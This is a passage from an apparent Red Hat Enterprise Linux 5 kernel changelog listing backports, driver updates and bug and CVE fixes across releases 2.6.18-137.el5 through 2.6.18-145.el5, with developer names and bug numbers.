hang on a multipath device (AMEET M. PARANJAPE ) [498927]\n- [wireless] mac80211: scanning related fixes (John W. Linville ) [498719]\n- [fs] ecryptfs: remove ecryptfs_unlink_sigs warnings (Eric Sandeen ) [499171]\n- [fs] ext4: re-fix warning on x86 build (Eric Sandeen ) [499202]\n- [ppc64] adjust oprofile_cpu_type detail (AMEET M. 
PARANJAPE ) [496709]\n- [nfs] SELinux can copy off the top of the stack (Eric Paris ) [493144]\n- [xen] x86: explicitly zero CR[1] in getvcpucontext (Miroslav Rezanina ) [494876]\n- [xen] x86: fix overflow in the hpet code (Rik van Riel ) [449346]\n- [xen] x86: fixes to the 'no missed-tick accounting' code (Rik van Riel ) [449346]\n- [xen] introduce 'no missed-tick accounting' (Rik van Riel ) [449346]\n- [xen] x86: misc fixes to the timer code (Rik van Riel ) [449346]\n- [xen] x86: initialize vlapic->timer_last_update (Rik van Riel ) [449346]\n[2.6.18-145.el5]\n- [ia64] xen: switch from flipping to copying interface (Chris Lalancette ) [479754]\n- [scsi] fnic: init retry counter (Mike Christie ) [484438]\n- [misc] add some long-missing capabilities to CAP_FS_MASK (Eric Paris ) [499076 497272] {CVE-2009-1072}\n- [crypto] add ansi_cprng test vectors (Jarod Wilson ) [497891]\n- [crypto] add rng self-test infra (Jarod Wilson ) [497891]\n- [md] bitmap merge feature (Doug Ledford ) [481226]\n- [md] fix lockup on read error (Doug Ledford ) [465781]\n- [md] dm-raid45: corrupt data and premature end of synch (Heinz Mauelshagen ) [480733 479383]\n- [fs] generic freeze ioctl interface (Eric Sandeen ) [476148]\n- [scsi] add mpt2sas driver (Tomas Henzl ) [475665]\n- [misc] kprobes: fix deadlock issue (John Villalovos ) [210555]\n- [block] disable iostat collection in gendisk (Jerome Marchand ) [484158]\n- [block] fix request flags (Jerome Marchand ) [484158]\n- [misc] fix blktrace api breakage (Hans-Joachim Picht ) [475334]\n- [fs] fuse: update for RHEL-5.4 (Josef Bacik ) [457975]\n[2.6.18-144.el5]\n- Revert: [scsi] MPT Fusion: update to version 3.04.07rh (Tomas Henzl ) [475455]\n- Revert: [scsi] make fusion MPT driver legacy I/O port free (Tomas Henzl ) [475451]\n- Revert: [scsi] MPT fusion: remove annoying debug message (Tomas Henzl ) [475455]\n- [openib] ehca: fix performance during creation of QPs (AMEET M. 
PARANJAPE ) [498527]\n- [scsi] qla4xxx: fix driver fault recovery (Marcus Barrow ) [497478]\n- [misc] make bus_find_device more robust, match upstream (Don Dutile ) [492488]\n- [md] dm snapshot: refactor __find_pending_exception (Mikulas Patocka ) [496100]\n- [md] race conditions in snapshots (Mikulas Patocka ) [496100]\n- [md] dm-raid1: switch read_record from kmalloc to slab (Mikulas Patocka ) [496101]\n- [md] dm-raid1/mpath: partially completed request crash (Mikulas Patocka ) [496101]\n- [md] snapshot: store damage (Mikulas Patocka ) [496102]\n- [scsi] cciss: change in discovering memory bar (Tomas Henzl ) [474392]\n- [scsi] cciss: version change for RHEL-5.4 (Tomas Henzl ) [474392]\n- [scsi] cciss: thread to detect config changes on MSA2012 (Tomas Henzl ) [474392]\n- [scsi] cciss: changes in config functions (Tomas Henzl ) [474392]\n- [openib] update all the backports for the code refresh (Doug Ledford ) [476301]\n- [openib] add support for XRC queues (Doug Ledford ) [476301]\n- [openib] RDS: add the RDS protocol (Doug Ledford ) [477065]\n- [openib] IPoIB: update to OFED 1.4.1-rc3 (Doug Ledford ) [434779 466086]\n- [openib] SRP: update to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] SDP: update to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] qlgc_vnic: update to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] cxgb3: update driver to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] iw_nes: update NES iWARP to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] mthca: update driver to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] ipath: update driver to OFED 1.4.1-rc3 (Doug Ledford ) [230035 480696]\n- [openib] ehca: update driver for RHEL-5.4 (Doug Ledford ) [466086]\n- [openib] core: disable lock dep annotation (Don Zickus ) [476301]\n- [openib] core: update core code to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] rmda: update rdma headers to OFED 1.4.1-rc3 (Doug Ledford ) [476301]\n- [openib] mlx4: Update mlx4_ib and 
mlx4_core, add mlx4_en (Doug Ledford ) [456525 477065]\n- [openib] enable mlx4_en and rds, disable iw_c2 (Doug Ledford ) [476301]\n- [mm] add tracepoints (Larry Woodman ) [493444]\n[2.6.18-143.el5]\n- [net] bonding: ignore updelay param when no active slave (Jiri Pirko ) [495318]\n- [net] ipv6: fix incoming packet length check (Jiri Pirko ) [492972]\n- [misc] drivers fix dma_get_required_mask (Tomas Henzl ) [475455]\n- [gfs2] NFSv2 support (Steven Whitehouse ) [497954]\n- [ppc64] set error_state to pci_channel_io_normal (AMEET M. PARANJAPE ) [496872]\n- [mm] allow tuning of MAX_WRITEBACK_PAGES (Larry Woodman ) [479079]\n- [trace] add 'success' to sched_wakeup/sched_wakeup_new (Jason Baron ) [497414]\n- [scsi] update iscsi layer and drivers for RHEL-5.4 (mchristi@redhat.com ) [436791 484455]\n- [crypto] fips: panic box when module validation fails (Neil Horman ) [497228]\n- [scsi] st: option to use SILI in variable block reads (Tom Coughlan ) [457970]\n- [net] bonding: support for bonding of IPoIB interfaces (Andy Gospodarek ) [430758]\n- [net] bonding: update to upstream version 3.4.0 (Andy Gospodarek ) [462632]\n- [scsi] add md3000 and md3000i entries to rdac_dev_list (John Feeney ) [487293]\n- [trace] tracepoints for page cache (KII Keiichi ) [475719]\n- [trace] tracepoints for network socket (KII Keiichi ) [475719]\n- [scsi] stex: support promise 6Gb sas raid controller (David Milburn ) [492022]\n- [scsi] add ALUA scsi device handler (mchristi@redhat.com ) [482737]\n- [scsi] update fnic fcoe driver for RHEL-5.4 (mchristi@redhat.com ) [484438]\n- [scsi] update libfc/fcoe for RHEL-5.4 (mchristi@redhat.com ) [484438]\n- [video] efifb: driver update (Brian Maly ) [488820]\n- [fs] fix softlockup in posix_locks_deadlock (Josef Bacik ) [476659]\n- [fs] cifs: unicode alignment and buffer sizing problems (Jeff Layton ) [494280] {CVE-2009-1439}\n- [mm] vmscan: bail out of direct reclaim after max pages (Rik van Riel ) [495442]\n- [crypto] add self-tests for rfc4309 (Jarod 
Wilson ) [472386]\n- [crypto] handle ccm dec test vectors expected to fail (Jarod Wilson ) [472386]\n- [crypto] fix rfc4309 deadlocks (Jarod Wilson ) [472386]\n- [scsi] marvell sas: comment cleanup (Rob Evers ) [485126]\n- [scsi] marvell sas: correct bit-map implementation (Rob Evers ) [485126]\n- [scsi] marvell sas: initial patch submission (Rob Evers ) [485126]\n- [acpi] CPU P-state limits ignored by OS (Stanislaw Gruszka ) [494288]\n- [net] provide a generic SIOETHTOOL ETHTOOL_GPERMADDR (Flavio Leitner ) [462352]\n- [scsi] lpfc: update to version 8.2.0.41 (Rob Evers ) [476738]\n- [scsi] lpfc: update to version 8.2.0.40 (Rob Evers ) [476738]\n- [scsi] lpfc: update to version 8.2.0.39 (Rob Evers ) [476738]\n- [scsi] lpfc: update to version 8.2.0.38 (Rob Evers ) [476738]\n[2.6.18-142.el5]\n- [net] ipv4: remove uneeded bh_lock/unlock from udp_rcv (Neil Horman ) [484590]\n- [net] ixgbe: update to upstream version 2.0.8-k2 (Andy Gospodarek ) [472547]\n- [net] igb: update to upstream version 1.3.16-k2 (Andy Gospodarek ) [484102 474881]\n- [mm] vmalloc: dont pass __GFP_ZERO to slab (Jiri Olsa ) [491685]\n- [agp] zero pages before sending to userspace (Jiri Olsa ) [497026] {CVE-2009-1192}\n- [net] e1000: enable TSO6 via ethtool with correct hw (Andy Gospodarek ) [449175]\n- [net] tg3: update to version 3.96 (Andy Gospodarek ) [481715 469772]\n- [x86] apic: rollover in calibrate_APIC_clock (Brian Maly ) [456938]\n- [alsa] handle subdevice_mask in snd_pci_quirk_lookup (Jaroslav Kysela ) [473949 483594]\n- [ia64] altix: performance degradation in PCI mode (George Beshers ) [497136]\n- [misc] I/O AT: config file changes (John Feeney ) [436048]\n- [misc] I/O AT: new ioat*.c (John Feeney ) [436048]\n- [misc] I/O AT: new dmaengine_v3.c (John Feeney ) [436048]\n- [misc] I/O AT: new include files (John Feeney ) [436048]\n- [misc] I/O AT: add drivers/dca (John Feeney ) [436048]\n- [misc] I/O AT: update network changes (John Feeney ) [436048]\n- [misc] I/O AT: update existing files 
(John Feeney ) [436048]\n- [misc] I/O AT: update include files (John Feeney ) [436048]\n- [mm] tweak vm diry_ratio to prevent stalls on some DBs (Larry Woodman ) [295291]\n- [nfs] setacl not working over NFS (Peter Staubach ) [496903]\n- [fs] ext4: update config options (Eric Sandeen ) [485315]\n- [fs] ext4: post-2.6.29 fixes (Eric Sandeen ) [485315]\n- [fs] backport patch for 2.6.29 ext4 (Eric Sandeen ) [485315]\n- [fs] rebase ext4 and jbd2 to 2.6.29 codebase (Eric Sandeen ) [485315 487933 487940 487944 487947] {CVE-2009-0745 CVE-2009-0746 CVE-2009-0747 CVE-2009-0748}\n- [fs] update write_cache_pages (Eric Sandeen ) [485315]\n- [fs] export set_task_ioprio (Eric Sandeen ) [485315]\n- [scsi] qla2xxx : updates and fixes from upstream, part 4 (Marcus Barrow ) [496126]\n- [scsi] MPT fusion: remove annoying debug message (Tomas Henzl ) [475455]\n- [scsi] make fusion MPT driver legacy I/O port free (Tomas Henzl ) [475451]\n- [scsi] MPT Fusion: update to version 3.04.07rh (Tomas Henzl ) [475455]\n- [x86] add MAP_STACK mmap flag (Larry Woodman ) [459321]\n- [scsi] sym53c8xx_2: fix up hotplug support (mchristi@redhat.com ) [461006]\n- [scsi] qla2xxx : updates and fixes from upstream, part 3 (Marcus Barrow ) [495094]\n- [scsi] qla2xxx : updates and fixes from upstream, part 2 (Marcus Barrow ) [495092]\n- [scsi] qla2xxx : updates and fixes from upstream, part 1 (Marcus Barrow ) [480204]\n- [nfs] memory leak when reading files wth option 'noac' (Peter Staubach ) [493045]\n- [x86] powernow-k8: export module parameters via sysfs (Prarit Bhargava ) [492010]\n- [misc] IO accounting: tgid accounting (Jerome Marchand ) [461636]\n- [misc] IO accounting: read accounting nfs fix (Jerome Marchand ) [461636]\n- [misc] IO accounting: read accounting (Jerome Marchand ) [461636]\n- [misc] IO accounting: write cancel accounting (Jerome Marchand ) [461636]\n- [misc] IO accounting: report in procfs (Jerome Marchand ) [461636]\n- [misc] IO accounting: account for direct-io (Jerome Marchand ) 
[461636]\n- [misc] IO accounting: set CONFIG_TASK_IO_ACCOUNTING (Jerome Marchand ) [461636]\n- [misc] IO accounting: write accounting (Jerome Marchand ) [461636]\n- [misc] IO accounting: core statistics (Jerome Marchand ) [461636]\n- [misc] IO accounting: read accounting cifs fix (Jerome Marchand ) [461636]\n- [misc] auxiliary signal structure: signal_struct_aux (Jerome Marchand ) [461636]\n- [misc] auxiliary signal structure: preparation (Jerome Marchand ) [461636]\n- [xen] x86: fix MSI eoi handling for HVM passthru (Gerd Hoffmann ) [477261]\n[2.6.18-141.el5]\n- [x86_64] more cpu_khz to tsc_khz conversions (Prarit Bhargava ) [483300]\n- [gfs2] unaligned access in gfs2_bitfit (Abhijith Das ) [485226]\n- [gfs2] remove scand & glockd kernel processes (Benjamin Marzinski ) [273001]\n- [x86] fix tick divider with clocksource=pit (Chris Lalancette ) [427588]\n- [fs] autofs4: fix incorect return in autofs4_mount_busy (Ian Kent ) [496766]\n- [x86] fix cpuid.4 instrumentation (Brian Maly ) [454981]\n- [md] dm-mpath: propagate ioctl error codes (Benjamin Marzinski ) [461469]\n- [fs] aio: race in aio_complete leads to process hang (Jeff Moyer ) [475814]\n- [s390] enable raw devices (Jeff Moyer ) [452534]\n- [net] bnx2: update to latest upstream - 1.9.3 (Ivan Vecera ) [475567 476897 489519]\n- [net] forcedeth: update to upstream version 0.62 (Ivan Vecera ) [479740]\n- [net] r8169: dont update stats counters when IF is down (Ivan Vecera ) [490162]\n- [net] r8169: fix RxMissed register access (Ivan Vecera ) [474334]\n- [x86] prevent boosting kprobes on exception address (Masami Hiramatsu ) [493088]\n- [gfs2] add fiemap support (Steven Whitehouse ) [476626]\n- [net] e1000e: fix false link detection (Michal Schmidt ) [492270]\n- [ppc] pseries: set error_state to pci_channel_io_normal (AMEET M. PARANJAPE ) [496872]\n- [nfs] large writes rejected when sec=krb5i/p specified (Peter Staubach ) [486756]\n- [wireless] iwlwifi: problems switching b/w WPA and WEP (John W. 
Linville ) [474699]\n- [net] ipv6: assume loopback address in link-local scope (Jiri Pirko ) [487233]\n- [fs] keep eventpoll from locking up the box (Josef Bacik ) [487585]\n- [ppc64] adjust oprofile_cpu_type (AMEET M. PARANJAPE ) [496709]\n- [fs] jbd: properly dispose of unmapped data buffers (Josef Bacik ) [479296]\n- [fs] ext3: dir_index: error out on corrupt dx dirs (Josef Bacik ) [454942]\n- [fs] ext3: dont resize if no reserved gdt blocks left (Josef Bacik ) [443541]\n- [agp] add pci ids for new video cards (John Villalovos ) [474513]\n- [ata] sata_mv: fix chip type for RocketRaid 1740/1742 (David Milburn ) [496338]\n- [misc] exit_notify: kill the wrong capable check (Oleg Nesterov ) [494271] {CVE-2009-1337}\n- [ipmi] fix platform crash on suspend/resume (peterm@redhat.com ) [475536]\n- [ipmi] fix some signedness issues (peterm@redhat.com ) [475536]\n- [ipmi] hold ATTN until upper layer is ready (peterm@redhat.com ) [475536]\n- [ipmi] allow shared interrupts (peterm@redhat.com ) [475536]\n- [scsi] add missing SDEV_DEL state if slave_alloc fails (Tomas Henzl ) [430170]\n- [net] eHEA: mutex_unlock missing in eHEA error path (AMEET M. PARANJAPE ) [482796]\n- [misc] xen: change PVFB not to select abs. pointer (Markus Armbruster ) [492866]\n- [pci] pci-stub module to reserve pci device (Mark McLoughlin ) [491842]\n- [pci] add remove_id sysfs entry (Mark McLoughlin ) [491842]\n- [pci] use proper call to driver_create_file (Mark McLoughlin ) [491842]\n- [pci] fix __pci_register_driver error handling (Mark McLoughlin ) [491842]\n- [misc] add /sys/bus/*/driver_probe (Mark McLoughlin ) [491842]\n- [misc] backport new ramdisk driver (Don Howard ) [480663]\n- [x86] general pci_scan_bus fix for baremetal and xen (Prarit Bhargava ) [494114]\n- [misc] add HP xw460c to bf sort pci list (Prarit Bhargava ) [490068]\n- [mm] enable dumping of hugepages into core dumps (Dave Anderson ) [470411]\n- [misc] hrtimer: check relative timeouts for overflow (AMEET M. 
PARANJAPE ) [492230]\n- [acpi] add T-state notification support (Luming Yu ) [487567]\n- [x86_64] copy_user_c can zero more data than needed (Vitaly Mayatskikh ) [490938]\n- [misc] hpilo: backport bugfixes and updates for RHEL-5.4 (tcamuso@redhat.com ) [488964]\n- [pci] do not clear PREFETCH register (Prarit Bhargava ) [486185]\n- [misc] waitpid reports stopped process more than once (Vitaly Mayatskikh ) [481199]\n- [scsi] ipr: enhance driver to support MSI-X interrupt (AMEET M. PARANJAPE ) [475717]\n- [specfile] add ability to build only debug kernel (Jeff Layton ) [469707]\n- [xen] clear X86_FEATURE_APIC in cpuid when apic disabled (ddugger@redhat.com ) [496873]\n- [xen] enable systems without APIC (ddugger@redhat.com ) [496873]\n- [xen] vt-d: workaround for Mobile Series 4 Chipset (ddugger@redhat.com ) [496873]\n- [xen] pci: fix definition of PCI_PM_CTRL_NO_SOFT_RESET (ddugger@redhat.com ) [496873]\n- [xen] utilise the GUEST_PAT and HOST_PAT vmcs area (ddugger@redhat.com ) [496873]\n- [xen] VT-d: enhance MTRR/PAT virtualization (ddugger@redhat.com ) [496873]\n- [xen] fix interrupt remapping on AMD systems (Bhavna Sarathy ) [477261]\n- [xen] enable AMD IOMMU Xen driver (Bhavna Sarathy ) [477261]\n- [xen] add AMD IOMMU Xen driver (Bhavna Sarathy ) [477261]\n- [xen] live migration failure due to fragmented memory (Jiri Denemark ) [469130]\n[2.6.18-140.el5]\n- [fs] xfs: add fiemap support (Josef Bacik ) [296951]\n- [net] add DSCP netfilter target (Thomas Graf ) [481652]\n- [gfs2] blocked after recovery (Abhijith Das ) [483541]\n- [net] remove misleading skb_truesize_check (Thomas Graf ) [474883]\n- [mm] 100% time spent under NUMA when zone_reclaim_mode=1 (Larry Woodman ) [457264]\n- [mm] msync does not sync data for a long time (Larry Woodman ) [479079]\n- [md] dm: fix OOps in mempool_free when device removed (Milan Broz ) [495230]\n- [net] bonding: clean up resources upon removing a bond (Masahiro Matsuya ) [463244]\n- [fs] nfs: convert to new aops (Jeff Layton ) 
[476224]\n- [fs] cifs: update CIFS for RHEL5.4 (Jeff Layton ) [465143]\n- [misc] types: add fmode_t typedef (Jeff Layton ) [465143]\n- [misc] keys: key facility changes for AF_RXRPC (Jeff Layton ) [465143]\n- [misc] xen: bump max_phys_cpus to 256 (Chris Lalancette ) [477206]\n- [misc] fork: CLONE_PARENT && parent_exec_id interaction (Don Howard ) [479964]\n- [wireless] iwlagn: make swcrypto/swcrypto50=1 default (John W. Linville ) [474699]\n- [wireless] mac80211: avoid null deref (John W. Linville ) [482990]\n- [net] fix out of bound access to hook_entries (Thomas Graf ) [484036]\n- [net] sctp: allow sctp_getladdrs to work for IPv6 (Neil Horman ) [492633]\n- [x86] xen: fix interaction between dom0 and NTP (Rik van Riel ) [494879]\n- [ata] sata_mv: fix 8-port timeouts on 508x/6081 chips (David Milburn ) [493451]\n- [net] fixed tcp_ack to properly clear ->icsk_probes_out (Jiri Olsa ) [494427]\n- [x86] xen: crash when specifying mem= (Chris Lalancette ) [240429]\n- [scsi] qla2xxx: reduce DID_BUS_BUSY failover errors (Marcus Barrow ) [244967]\n- [ata] libata: ahci enclosure management bios workaround (David Milburn ) [488471]\n- [scsi] aic7xxx: increase max IO size (mchristi@redhat.com ) [493448]\n- [nfs] v4: client crash on file lookup with long names (Sachin S. 
Prabhu ) [493942]\n- [mm] fix prepare_hugepage_range to check offset (Larry Woodman ) [488260]\n- [misc] make sure fiemap.h is installed in headers pkg (Josef Bacik ) [296951]\n- [fs] generic block based fiemap (Josef Bacik ) [296951]\n- [fs] add fiemap interface (Josef Bacik ) [296951]\n- [trace] use unregister return value (Jason Baron ) [465543]\n- [trace] change rcu_read_sched -> rcu_read (Jason Baron ) [465543]\n- [trace] introduce noupdate apis (Jason Baron ) [465543]\n- [trace] simplify rcu usage (Jason Baron ) [465543]\n- [trace] fix null pointer dereference (Jason Baron ) [465543]\n- [trace] tracepoints fix reentrancy (Jason Baron ) [465543]\n- [trace] make tracepoints use rcu sched (Jason Baron ) [465543]\n- [trace] use TABLE_SIZE macro (Jason Baron ) [465543]\n- [trace] remove kernel-trace.c (Jason Baron ) [465543]\n- [trace] remove prototype from tracepoint name (Jason Baron ) [465543]\n- [x86] use CPU feature bits to skip tsc_unstable checks (Chris Lalancette ) [463573]\n- [x86] vmware: disable softlock processing on tsc systems (Chris Lalancette ) [463573]\n- [x86] vmware lazy timer emulation (Chris Lalancette ) [463573]\n- [x86] xen: improve KVM timekeeping (Chris Lalancette ) [463573]\n- [x86_64] xen: implement a minimal TSC based clocksource (Chris Lalancette ) [463573]\n- [x86] use cpu_khz for loops_per_jiffy calculation (Chris Lalancette ) [463573]\n- [x86] vmware: look for DMI string in product serial key (Chris Lalancette ) [463573]\n- [x86] VMware: Fix vmware_get_tsc code (Chris Lalancette ) [463573]\n- [x86] xen: add X86_FEATURE_HYPERVISOR feature bit (Chris Lalancette ) [463573]\n- [x86] xen: changes timebase calibration on Vmware (Chris Lalancette ) [463573]\n- [x86] add a synthetic TSC_RELIABLE feature bit (Chris Lalancette ) [463573]\n- [x86] hypervisor: detection and get tsc_freq (Chris Lalancette ) [463573]\n- [x86] fdiv bug detection fix (Chris Lalancette ) [463573]\n- [misc] printk: add KERN_CONT (Chris Lalancette ) [463573]\n- [s390] 
add additional card IDs to CEX2C and CEX2A (Hans-Joachim Picht ) [488496]\n- [gfs2] merge upstream uevent patches into RHEL 5.4 (Steven Whitehouse ) [476707]\n- [xen] x86: GDT: replace single page with one page/CPU (Chris Lalancette ) [477206]\n- [xen] x86: VPID: free resources (ddugger@redhat.com ) [464821]\n- [xen] x86: VPID: implement feature (ddugger@redhat.com ) [464821]\n- [xen] fix 32-on-64 PV oops in xen_set_pud (Chris Lalancette ) [467698]\n[2.6.18-139.el5]\n- [pci] xen dom0: hook PCI probe and remove callbacks (ddugger@redhat.com ) [484227]\n- [misc] xen dom0: add hypercall for add/remove PCI device (ddugger@redhat.com ) [484227]\n- [pci] xen: dom0/domU MSI support using PHSYDEV_map_irq (ddugger@redhat.com ) [484227]\n- [mm] mmu_notifier: kabi workaround support (john cooper ) [485718]\n- [mm] mmu_notifier: set CONFIG_MMU_NOTIFIER to y (john cooper ) [485718]\n- [mm] mmu-notifier: optimized ability to admin host pages (john cooper ) [485718]\n- [mm] mmu-notifiers: add mm_take_all_locks operation (john cooper ) [485718]\n- [misc] introduce list_del_init_rcu (john cooper ) [485718]\n- [ppc] spufs: fix incorrect buffer offset in regs write (AMEET M. PARANJAPE ) [493426]\n- [ppc] spufs: check offset before calculating write size (AMEET M. PARANJAPE ) [493426]\n- [net] add dropmonitor protocol (Neil Horman ) [470539]\n- [ppc] reject discontiguous MSI-X requests (AMEET M. PARANJAPE ) [492580]\n- [ppc] implement a quota system for MSIs (AMEET M. PARANJAPE ) [492580]\n- [ppc] return req#msi(-x) if request is larger (AMEET M. PARANJAPE ) [492580]\n- [ppc] msi: return the number of MSIs we could allocate (AMEET M. PARANJAPE ) [492580]\n- [ppc] check for MSI-X also in rtas_msi_pci_irq_fixup() (AMEET M. PARANJAPE ) [492580]\n- [ppc] add support for ibm,req#msi-x (AMEET M. PARANJAPE ) [492580]\n- [ppc] fix MSI-X interrupt querying (AMEET M. PARANJAPE ) [492580]\n- [ppc] msi: return the number of MSI-X available (AMEET M. 
PARANJAPE ) [492580]\n- [trace] add include/trace dir to -devel (Jason Baron ) [489096]\n- [mm] xen: 'ptwr_emulate' messages when booting PV guest (Chris Lalancette ) [490567]\n- [fs] lockd: reference count leaks in async locking case (Jeff Layton ) [471254]\n- [s390] kernel: cpcmd with vmalloc addresses (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: error handling in iucv_callback_txdone (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: broken send_skb_q result in endless loop (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: free iucv path/socket in path_pending cb (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: avoid left over IUCV connections (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: new error return codes for connect (Hans-Joachim Picht ) [487697]\n- [s390] af_iucv: hang if recvmsg is used with MSG_PEEK (Hans-Joachim Picht ) [487703]\n- [net] ixgbe: stop double counting frames and bytes (Andy Gospodarek ) [487213]\n- [net] netfilter: x_tables: add connlimit match (Jiri Pirko ) [483588]\n- [nfs] only set file_lock.fl_lmops if stateowner is found (Jeff Layton ) [479323]\n- [dlm] init file_lock before copying conflicting lock (Jeff Layton ) [479323]\n- [nfs] nfsd: ensure nfsv4 calls the fs on LOCKT (Jeff Layton ) [479323]\n- [net] allow for on demand emergency route cache flushing (Neil Horman ) [461655]\n- [xen] x86: update the earlier APERF/MPERF patch (Chris Lalancette ) [493557]\n- [xen] fix evtchn exhaustion with 32-bit HVM guest (Chris Lalancette ) [489274]\n- [xen] ia64: fix HVM guest kexec (Chris Lalancette ) [418591]\n- [xen] ia64: fix whitespace error in vmx.h (Chris Lalancette ) [477098]\n- [xen] add hypercall for adding and removing PCI devices (ddugger@redhat.com ) [484227]\n- [xen] HVM MSI passthrough support (ddugger@redhat.com ) [484227]\n- [xen] VT-d2: enable interrupt remapping for MSI/MSI-x (ddugger@redhat.com ) [484227]\n- [xen] MSI support interface (ddugger@redhat.com ) [484227]\n- [xen] MSI supprt internal functions 
(ddugger@redhat.com ) [484227]\n- [xen] convert pirq to per-domain (ddugger@redhat.com ) [484227]\n- [xen] rename evtchn_lock to event_lock (ddugger@redhat.com ) [484227]\n- [xen] sync VT-d2 code with xen-unstable (ddugger@redhat.com ) [484227]\n- [xen] VT-d2: support interrupt remapping (ddugger@redhat.com ) [484227]\n- [xen] VT-d2: support queue invalidation (ddugger@redhat.com ) [484227]\n- [xen] x86: emulate accesses to PCI window regs cf8/cfc (ddugger@redhat.com ) [484227]\n- [xen] vtd: avoid redundant context mapping (ddugger@redhat.com ) [484227]\n- [xen] x86: fix EPT for VT-d (ddugger@redhat.com ) [484227]\n- [xen] x86: add domctl interfaces for VT-d (ddugger@redhat.com ) [484227]\n- [xen] x86: memory changes for VT-d (ddugger@redhat.com ) [484227]\n- [xen] x86: intercept I/O for assigned device (ddugger@redhat.com ) [484227]\n- [xen] x86: IRQ injection changes for VT-d (ddugger@redhat.com ) [484227]\n- [xen] add VT-d specific files (ddugger@redhat.com ) [484227]\n- [xen] some system changes for VT-d (ddugger@redhat.com ) [484227]\n- [xen] add VT-d public header files (ddugger@redhat.com ) [484227]\n- [xen] ia64: add pci definitions and access functions (ddugger@redhat.com ) [484227]\n[2.6.18-138.el5]\n- [nfs] remove bogus lock-if-signalled case (Bryn M. 
Reeves ) [456288]\n- [gfs2] fix uninterruptible quotad sleeping (Steven Whitehouse ) [492943]\n- [net] iptables NAT port randomisation (Thomas Graf ) [459943]\n- [gfs2] tar off gfs2 broken - truncated symbolic links (Steven Whitehouse ) [492911]\n- [net] skip redirect msg if target addr is not link-local (Thomas Graf ) [481209]\n- [scsi] lpfc: remove duplicate pci* functions from driver (Prarit Bhargava ) [442007]\n- [net] igb: make driver ioport free (Prarit Bhargava ) [442007]\n- [net] e1000: make driver ioport free (Prarit Bhargava ) [442007]\n- [net] e1000e: make driver ioport free (Prarit Bhargava ) [442007]\n- [pci] add pci*_selected_region/pci_enable_device_io|mem (Prarit Bhargava ) [442007]\n- [x86] NONSTOP_TSC in tsc clocksource (Luming Yu ) [474091]\n- [ppc] keyboard not recognized on bare metal (Justin Payne ) [455232]\n- [fs] writeback: fix persistent inode->dirtied_when val (Jeff Layton ) [489359]\n- [fs] xfs: misc upstream fixes (Eric Sandeen ) [470845]\n- [fs] xfs: fix compat ioctls (Eric Sandeen ) [470845]\n- [fs] xfs: new aops interface (Eric Sandeen ) [470845]\n- [fs] xfs: backport to rhel5.4 kernel (Eric Sandeen ) [470845]\n- [fs] xfs: update to 2.6.28.6 codebase (Eric Sandeen ) [470845]\n- [fs] d_obtain_alias helper (Eric Sandeen ) [470845]\n- [fs] d_add_ci helper (Eric Sandeen ) [470845]\n- [misc] completion helpers (Eric Sandeen ) [470845]\n- [fs] block_page_mkwrite helper (Eric Sandeen ) [470845]\n- [mm] generic_segment_checks helper (Eric Sandeen ) [470845]\n- [i2c] add support for SB800 SMBus (Bhavna Sarathy ) [488746]\n- [i2c] i2c-piix4: support for the Broadcom HT1100 chipset (Flavio Leitner ) [474240]\n- [s390] hvc_iucv: z/VM IUCV hypervisor console support (Hans-Joachim Picht ) [475551]\n- [s390] hvc_console: upgrade version of hvc_console (Hans-Joachim Picht ) [475551]\n- [s390] iucv: locking free version of iucv_message_ (Hans-Joachim Picht ) [475551]\n- [s390] set default preferred console device 'ttyS' (Hans-Joachim Picht ) 
[475551]\n- [s390] kernel: shutdown action 'dump_reipl' (Hans-Joachim Picht ) [474688]\n- [s390] splice: handle try_to_release_page failure (Hans-Joachim Picht ) [475334]\n- [s390] blktrace: add ioctls to SCSI generic devices (Hans-Joachim Picht ) [475334]\n- [s390] add FCP performance data collection (Hans-Joachim Picht ) [475334]\n- [s390] extra kernel parameters via VMPARM (Hans-Joachim Picht ) [475530]\n- [s390] kernel: extra kernel parameters via VMPARM (Hans-Joachim Picht ) [475530]\n- [s390] z90crypt: add ap adapter interrupt support (Hans-Joachim Picht ) [474700]\n- [s390] add Call Home data (Hans-Joachim Picht ) [475820]\n- [s390] kernel: processor degredation support (Hans-Joachim Picht ) [475820]\n- [s390] kernel: Shutdown Actions Interface (Hans-Joachim Picht ) [475563]\n- [s390] provide service levels of HW & Hypervisor (Hans-Joachim Picht ) [475570]\n- [s390] qeth: ipv6 support for hiper socket layer 3 (Hans-Joachim Picht ) [475572]\n- [s390] kernel: NSS Support (Hans-Joachim Picht ) [474646]\n- [acpi] donot evaluate _PPC until _PSS has been evaluated (Matthew Garrett ) [469105]\n- [net] iwlwifi: enable LEDS Kconfig options (John W. 
Linville ) [486030]\n- [spec] devel pkg: own the directories they write too (Don Zickus ) [481808]\n- [crypto] bugfixes to ansi_cprng for fips compliance (Neil Horman ) [481175 469437]\n- [scsi] qla2xxx: production FCoE firmware (Marcus Barrow ) [471900]\n- [scsi] qla2xxx: production FCoE support (Marcus Barrow ) [471900]\n- [fs] add compat_sys_ustat (Eric Sandeen ) [472426]\n- [x86_64] panic if AMD cpu_khz is wrong (Prarit Bhargava ) [472523]\n- [x86] fix calls to pci_scan_bus (Prarit Bhargava ) [470202]\n[2.6.18-137.el5]\n- [fs] HFS: mount memory leak (Dave Anderson ) [488048]\n- [docs] document netdev_budget (Stanislaw Gruszka ) [463249]\n- [net] netfilter: nfmark IPV6 routing in OUTPUT (Anton Arapov ) [470059]\n- [gfs2] use ->page_mkwrite for mmap() (Benjamin Marzinski ) [315191]\n- [fs] ecryptfs: fix memory leak into crypto headers (Eric Sandeen ) [491256]\n- [x86] add nonstop_tsc flag in /proc/cpuinfo (Luming Yu ) [474091]\n- [alsa] HDA: update for RHEL-5.4 (Jaroslav Kysela ) [483594]\n- [fs] autofs4: fix lookup deadlock (Ian Kent ) [490078]\n- [fs] autofs4: make autofs type usage explicit (Ian Kent ) [452120]\n- [fs] autofs4: add 